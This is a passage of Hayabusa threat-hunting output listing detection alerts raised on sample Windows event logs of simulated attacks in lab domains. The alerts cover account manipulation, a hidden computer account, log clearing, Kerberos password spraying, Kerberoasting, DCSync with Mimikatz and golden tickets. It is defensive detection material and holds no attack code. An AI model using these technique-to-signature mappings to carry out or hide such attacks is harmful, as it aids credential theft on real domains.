OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx -2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! (Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx -2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx -2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx -2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 